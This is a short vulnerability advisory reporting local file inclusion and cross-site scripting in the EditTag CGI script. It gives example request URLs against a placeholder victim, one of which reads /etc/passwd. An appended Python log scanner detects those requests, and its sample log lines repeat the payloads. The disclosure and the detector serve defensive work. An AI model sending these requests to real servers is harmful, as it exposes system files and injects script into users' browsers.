Multiple bugs in EditTag

2007-01-06T00:00:00
ID SECURITYVULNS:DOC:15602
Type securityvulns
Reporter Securityvulns
Modified 2007-01-06T00:00:00

Description

Script: EditTag
Version: 1.2
Author: Greg Billock (dmacewen@isn.net)
Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir)

I am sorry for my BAD English.

Description:

1) Local file injection: an attacker can use the file parameter of edittag.cgi or edittag_mp.cgi (possibly also the .pl variants) to inject local files (e.g. /etc/passwd).

http://www.victim/edittag/edittag.cgi?file=INJECT
http://www.victim/edittag/edittag.pl?file=INJECT
http://www.victim/edittag/edittag_mp.cgi?file=INJECT
http://www.victim/edittag/edittag_mp.pl?file=INJECT

ex. http://www.victim/edittag/edittag_mp.pl?file=/etc/passwd

2) XSS

http://www.victim/edittag/mkpw_mp.cgi?plain=XSS
http://www.victim/edittag/mkpw.pl?plain=XSS
http://www.victim/edittag/mkpw.cgi?plain=XSS
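
A log check for the two issues above, added here as an example and not part of the original advisory: it flags requests to the listed scripts whose file value is an absolute or parent-relative path, or whose plain value contains markup characters. The Combined Log Format input, the sample lines and the rule that legitimate file values are relative names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script and parameter names are the ones listed in the advisory.
FILE_SCRIPTS = re.compile(r"/edittag(_mp)?\.(cgi|pl)$", re.I)
PLAIN_SCRIPTS = re.compile(r"/mkpw(_mp)?\.(cgi|pl)$", re.I)
# Request field of a Common/Combined Log Format line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"[<>\"']")

def decode(value, rounds=2):
    """Strip extra percent-encoding layers (parse_qs already removed one)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return 'file-path', 'markup' or None for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)
    if FILE_SCRIPTS.search(url.path):
        for value in map(decode, params.get("file", [])):
            # Assumption: legitimate values are relative names under the
            # EditTag directory, so absolute paths and ".." are suspicious.
            if value.startswith(("/", "\\")) or ".." in value or "\x00" in value:
                return "file-path"
    if PLAIN_SCRIPTS.search(url.path):
        for value in map(decode, params.get("plain", [])):
            if MARKUP.search(value):
                return "markup"
    return None

def scan(lines):
    return [(v, ln) for ln in lines if (v := classify(ln))]

# Constructed sample log lines (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jan/2007:10:00:01 +0000] "GET /edittag/edittag_mp.pl?file=/etc/passwd HTTP/1.1" 200 1432',
    '192.0.2.10 - - [06/Jan/2007:10:00:04 +0000] "GET /edittag/edittag.cgi?file=%252Fetc%252Fpasswd HTTP/1.1" 200 1432',
    '192.0.2.11 - - [06/Jan/2007:10:02:10 +0000] "GET /edittag/mkpw.cgi?plain=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 212',
    '192.0.2.12 - - [06/Jan/2007:10:03:00 +0000] "GET /edittag/edittag.cgi?file=index.html HTTP/1.1" 200 5120',
    '192.0.2.12 - - [06/Jan/2007:10:03:30 +0000] "GET /edittag/mkpw.cgi?plain=hunter2 HTTP/1.1" 200 200',
]
```

Hits are candidates for review, not confirmed exploitation; the markup rule in particular is a heuristic.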